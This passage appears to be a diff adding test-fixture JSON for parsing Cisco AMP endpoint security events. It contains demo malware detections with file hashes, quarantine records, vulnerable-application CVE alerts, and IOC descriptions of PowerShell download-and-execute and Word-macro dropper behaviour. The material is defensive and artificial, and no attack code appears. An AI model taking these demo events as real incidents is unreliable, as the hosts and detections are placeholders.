+ }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-12T10:15:22.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Exploit_Prevention_Audit", + "hostname": "Demo_AMP_Exploit_Prevention_Audit" + }, + "event": { + "severity": 0, + "action": "Policy Update", + "ingested": "2021-09-12T17:32:35.701404886Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "id": "6532910514396201000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "d2:78:15:4a:f4:a2", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "d2:78:15:4a:f4:a2" + ] + }, + "group_guids": [ + "test_group_guid" + 
], + "event_type_id": 553648130 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "explorer.exe", + "pid": 2632, + "hash": { + "sha1": "84123a3decdaa217e3588a1de59fe6cee1998004", + "sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", + "md5": "38ae1b3c38faef56fe4907922f0385ba" + } + }, + "@timestamp": "2020-12-25T05:49:09.000Z", + "file": { + "name": "OLD.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe", + "hash": { + "sha1": "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c", + "sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "md5": "cfdd16225e67471f5ef54cab9b3a5558" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Intel" + ], + "hash": [ + "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "cfdd16225e67471f5ef54cab9b3a5558", + "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Intel", + "hostname": "Demo_AMP_Intel", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701406760Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6525520937264087000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.GenericKD:Malwaregen.21do.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e6:44:a0:56:f3:9a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e6:44:a0:56:f3:9a" + ] + }, + "group_guids": [ + 
"test_group_guid" + ], + "detection_id": "6525520937264087041", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2020-12-25T05:49:09.000Z", + "file": { + "hash": { + "sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Intel" + ], + "hash": [ + "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Intel", + "hostname": "Demo_AMP_Intel" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701408626Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": 
"6525520937264087000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e6:44:a0:56:f3:9a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e6:44:a0:56:f3:9a" + ] + }, + "detection_id": "6525520937264087041", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "powershell.exe", + "pid": 4868, + "hash": { + "sha1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d", + "sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "md5": "92f44e405db16ac55d97e3bfe3b132fa" + } + }, + "@timestamp": "2020-12-25T05:30:44.000Z", + "file": { + "name": "twhy.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe", + "hash": { + "sha1": "7d9518ea3f98d037745352b23861fab05d3777dc", + "sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "md5": "c624d61b8f076c3ef05f74eeb96c8954" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Intel" + ], + "hash": [ + "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "c624d61b8f076c3ef05f74eeb96c8954", + "7d9518ea3f98d037745352b23861fab05d3777dc" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Intel", + "hostname": "Demo_AMP_Intel", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701410523Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6525516191325225000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": 
"Auto.F2863A.211556.in02", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e6:44:a0:56:f3:9a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e6:44:a0:56:f3:9a" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6525516191325224961", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2020-12-25T05:30:44.000Z", + "file": { + "hash": { + "sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Intel" + ], + "hash": [ + "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Intel", + "hostname": "Demo_AMP_Intel" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701412407Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6525516191325225000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e6:44:a0:56:f3:9a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e6:44:a0:56:f3:9a" + ] + }, + "detection_id": "6525516191325224961", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7" + } + }, + "@timestamp": "2020-12-25T05:30:41.000Z", + "file": { + "name": "powershell.exe", + "path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe", + "hash": { + "sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Intel" + ], + "hash": [ + 
"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Intel", + "hostname": "Demo_AMP_Intel" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:35.701414261Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", + "kind": "alert", + "start": "2020-12-25T05:30:41.000Z", + "action": "Cloud IOC", + "id": "1519340132516139000", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e6:44:a0:56:f3:9a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e6:44:a0:56:f3:9a" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.PowershellDownloadedExecutable.ioc", + "description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command." 
+ }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7" + } + }, + "@timestamp": "2020-12-25T05:30:41.000Z", + "file": { + "name": "powershell.exe", + "path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe", + "hash": { + "sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Intel" + ], + "hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Intel", + "hostname": "Demo_AMP_Intel" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701416142Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud 
IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", + "kind": "alert", + "start": "2020-12-25T05:30:41.000Z", + "action": "Cloud IOC", + "id": "1519340132474871000", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e6:44:a0:56:f3:9a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e6:44:a0:56:f3:9a" + ] + }, + "group_guids": [ + "test_group_guid" + ], + 
"cloud_ioc": { + "short_description": "W32.WinWord.Powershell", + "description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables." + }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8" + } + }, + "@timestamp": "2020-12-25T05:02:27.000Z", + "file": { + "name": "mshtml.dll", + "hash": { + "sha256": "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Intel" + ], + "hash": [ + "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Intel", + "hostname": "Demo_AMP_Intel" + }, + "event": { + "severity": 1, + "ingested": "2021-09-12T17:32:35.701418Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application 
Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", + "kind": "alert", + "start": "2020-12-25T05:02:27.000Z", + "action": "Vulnerable Application Detected", + "id": "15193384389977", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e6:44:a0:56:f3:9a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e6:44:a0:56:f3:9a" + ], + "cve": [ + "CVE-2018-0762", + "CVE-2018-0772" + ] + }, + "vulnerabilities": [ + { + "name": "Microsoft 
Internet Explorer", + "score": "7.6", + "cve": "CVE-2018-0762", + "version": "11", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762" + }, + { + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772", + "cve": "CVE-2018-0772" + } + ], + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296279 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8" + } + }, + "@timestamp": "2020-12-25T05:02:26.000Z", + "file": { + "name": "mshtml.dll", + "hash": { + "sha256": "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Intel" + ], + "hash": [ + "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Intel", + "hostname": "Demo_AMP_Intel" + }, + "event": { + "severity": 1, + "ingested": "2021-09-12T17:32:35.701419883Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application 
Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7